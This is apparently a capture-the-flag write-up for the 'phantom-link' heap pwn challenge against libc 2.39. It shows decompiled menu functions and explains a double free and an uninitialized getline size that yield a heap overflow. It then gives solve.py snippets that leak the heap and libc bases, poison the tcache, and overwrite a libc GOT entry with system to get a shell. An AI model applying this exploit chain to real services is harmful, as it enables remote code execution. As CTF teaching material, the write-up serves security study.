`#`phantom-link

nc 0.cloud.chals.io 30126

Heap of trouble? More like a heap of fun! Dig through the chaos to uncover the flag.

LMS <- author pwn <- category 500ish <- points idr <- solves hard <- difficulty

The challenge presents a typical heap note interface:

TEXT

--- Menu ---
1. Add Data
2. Remove Data
3. Print Data
4. Exit
Please enter your choice:

binja decompile of add dataC   1 
   2 
   3 
   4 
   5 
   6 
   7 
   8 
   9 
  10 
  11 
  12 
  13 
  14 
  15 
  16 
  17 
  18 
  19 
  20 
int64_t add_data()
    printf(format: "Enter size: ")
    uint64_t n
    __isoc99_scanf(format: "%d", &n)
    getchar()
    printf(format: "Enter data: ")
    int32_t idx = 0
    
    while (true)
        if (idx s> 9)
            return puts(str: "No more space to add data.")
        
        if (data_array[sx.q(idx)].size s<= 0)
            break
        
        idx += 1
    
    getline(lineptr: &data_array[sx.q(idx)], &n, stream: stdin)
    data_array[sx.q(idx)].size = n.d
    return printf(format: "Data added successfully to index…", zx.q(idx))

binja decompile of remove dataC   1 
   2 
   3 
   4 
   5 
   6 
   7 
   8 
   9 
  10 
  11 
int64_t remove_data()
    printf(format: "Enter index of data to remove: ")
    int32_t idx
    __isoc99_scanf(format: "%d", &idx)
    
    if (idx s< 0 || idx s> 9 || data_array[sx.q(idx)].data == 0)
        return puts(str: "Invalid index or data not found.")
    
    free(mem: data_array[sx.q(idx)].data)
    data_array[sx.q(idx)].size = 0
    return puts(str: "Data removed successfully.")

binja decompile of print dataC   1 
   2 
   3 
   4 
void print_data()
    for (int32_t i = 0; i s<= 9; i += 1)
        if (data_array[sx.q(i)].size != 0)
            printf(format: "Index %d: %s\n", zx.q(i), data_array[sx.q(i)].data)

Looking through the heapnote functions, there are two vulnerabilities. The first vulnerability is double free in remove_data, since it only checks that the data is non-zero, not that the size is non-zero. The second vulnerability has to do with how the chal reads the size of the input data in add_data. Inside add_data n is defined as a 64 bit integer, however it uses scanf("%d") to read in the number. This leaves the upper 32 bits of n uninitialized with whatever was on the stack at that location, and due to the behavior of getline effectively turns the function into a pseudo gets function.

`#`getline antics

man 3 getline

DESCRIPTION

getline() reads an entire line from stream, storing the address of the buffer containing the text into *lineptr. The buffer is null-terminated and includes the newline character, if one was found.

If *lineptr is set to NULL before the call, then getline() will allocate a buffer for storing the line. This buffer should be freed by the user program even if getline() failed.

Alternatively, before calling getline(), *lineptr can contain a pointer to a malloc(3)-allocated buffer *n bytes in size. If the buffer is not large enough to hold the line, getline() resizes it with realloc(3), updating *lineptr and *n as necessary.

In either case, on a successful call, *lineptr and *n will be updated to reflect the buffer address and allocated size respectively.

getdelim() works like getline(), except that a line delimiter other than newline can be specified as the delimiter argument. As with getline(), a delimiter character is not added if one was not present in the input before end of file was reached.

data_array is a 10 element array that is zero initialized, and on the first getline call for each index getline will allocate a buffer whose size is dependent on how much input is read in. On the second call the buffer is never resized because of the upper 32 bits of n are uninitialized, making getline think the buffer is huge. While this means we have easy heap overflow (getline never resizes the buffer no matter how much input we send), it also means that malloc can only be called a maximum on 10 times.

`#`heap leak (4/10 allocations)

The challenge is using libc 2.39 and the heap has safe linking, so our first step should be getting a heap leak to defeat safe linking.

solve.pyPY

a = make(0x10, b"")         # data_array[0] = { .data = ptr, .size = 0x10 }
free(a)                     # data_array[0] = { .data = ptr, .size = 0x00 }
assert a == make(0x10, b"") # data_array[0] = { .data = ptr, .size = 0x10 }

b = make(0x10, b"")         # data_array[1] = { .data = ptr, .size = 0x10 }
d = make(0x3d0, b"")        # <-- setup for later
c = make(0x10, b"")         # <-- setup for later

free(c)                     # <-- setup for later
free(a)                     # data_array[0] = .{ .data = freed(ptr), .size = 0x00 }
                            # data_array[1] = .{ .data = freed(ptr), .size = 0x10 }

leak = u64(view()[1].ljust(8, b"\x00"))
log.info(f"{leak = :#x}")   # leak data_array[1] since size is non-zero

We can abuse remove_data along with the getline behavior discussed above to get a double reference to a heap chunk. Freeing one of the references while the other one still has a non-zero size allows us to print a leak the first qword.

solve.pyPY

s = Solver() # im lazy so use z3
base = BitVec('base', 64)
addr = BitVec('addr', 64)
next = BitVec('next', 64)
s.add(addr == base + 0x2a0)
s.add(next ^ (addr >> 12) == leak)
s.add(next & 0xFFF == 0xab0)
s.add(next == base + 0xab0)

print(s.check())
heapbase = s.model()[base].as_long()
mangle = heapbase >> 12
log.info(f"{heapbase = :#x}")

Here we cheat a tiny bit. Since we are given a dockerfile we can determine the exact offset from the heapbase the leaked chunk will be. This allows us to decode the encrypted pointer to recover the heapbase.

`#`libc leak (6/10 allocations)

solve.pyPY

assert a == make(0x10, p64((heapbase + 0x30 + 0x80 + 0x10) ^ mangle))
assert c == make(0x10, b"")

e = make(0x10, b"")
f = make(0x10, b"")

free(d)
free(c)
free(a)

assert a == make(0x10, p64((heapbase + 0x320) ^ mangle))
assert d == make(0x10, b"", lim=False)
assert c == make(0x10, b"")

g = make(0x10, b"")
h = make(0x10, b"")

leak = u64(view()[5].ljust(8, b"\x00"))
log.info(f"{leak = :#x}")
leak = leak ^ mangle
log.info(f"{leak = :#x}")
if args.GDB:
    guess = int(input("guess: "), 16)
else:
    guess = 5
leak = (leak & ~0xFFFF) | 0xd00 | (guess << 12)
libcbase = leak - 0x1d7d00
log.info(f"{leak = :#x}")
log.info(f"{libcbase = :#x}")

In this specific libc version, the lowest byte of the unsorted bin address is 0x00 and prevents leaking the full raw unsorted bin address. One easy way to get around this is to move the chunk from unsorted into either smallbin or largebin, where the lowest byte should no longer be 0x00. Issue with that strategy is it takes up too many allocations, not leaving enough for the final rce step.

The other method (which took me a few days to realize during the competition) is to insert the chunk into the tcache, using the tcache's own pointer encryption to destroy the null byte and allow recovery of the encrypted unsorted bin address with our heap leak. This also explains the name of the challenge phantom-link, because we need to mess with the tcache to create fake links to chunks.

`#`full rce (exactly 10/10 allocations)

solve.pyPY

target = libcbase + 0x1d7000 + 0x70

free(c)
free(a)

assert a == make(0x10, p64(target ^ mangle))
assert c == make(0x10, b"")

i = make(0x10, b"sh\x00")
system = libcbase + libc.sym.system
log.info(f"{system = :#x}")
j = make(0x20, p64(0) + p64(system))

sendlineafter(b": ", 3)

p.interactive()

Popping a shell is done by overwriting a libc got entry to trigger system while getline is reading input. I think I was overwriting the memchr got entry, but I do not really remember at this point and I'm too lazy to check.

`#`CONTENT

`#`TOP

`#`phantom-link

`#`getline antics

`#`heap leak (4/10 allocations)

`#`libc leak (6/10 allocations)

`#`full rce (exactly 10/10 allocations)

#CONTENT

#TOP

#phantom-link

#getline antics

#heap leak (4/10 allocations)

#libc leak (6/10 allocations)

#full rce (exactly 10/10 allocations)

`#`CONTENT

`#`TOP

`#`phantom-link

`#`getline antics

`#`heap leak (4/10 allocations)

`#`libc leak (6/10 allocations)

`#`full rce (exactly 10/10 allocations)